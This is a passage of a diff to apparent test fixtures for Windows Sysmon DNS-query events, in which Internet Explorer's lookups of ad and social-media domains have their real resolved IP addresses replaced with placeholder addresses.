Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7692,7 +7692,7 @@ "event_data": { "QueryName": "match.sync.ad.cpe.dotomi.com", "QueryStatus": "0", - "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.730", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7723,7 +7723,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7755,7 +7755,7 @@ "ProcessId": "2736", "QueryName": "tps10230.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;" + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;" } }, "agent": { @@ -7772,7 +7772,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7800,7 +7800,7 @@ "ProcessId": "2736", "QueryName": "tps10221.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:10.650" }, @@ -7828,7 +7828,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:16.329", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7852,7 +7852,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -7860,7 +7860,7 @@ { "@timestamp": "2021-05-05T15:30:51.712Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7884,7 +7884,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;", + "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:16.386", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7904,7 +7904,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -7934,7 +7934,7 @@ "ProcessId": "2736", "QueryName": "syndication.twitter.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;" + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;" } }, "log": { @@ -7955,7 +7955,7 @@ "ProcessId": "2736", "QueryName": "ade.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:19.578" }, @@ -7974,7 +7974,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData 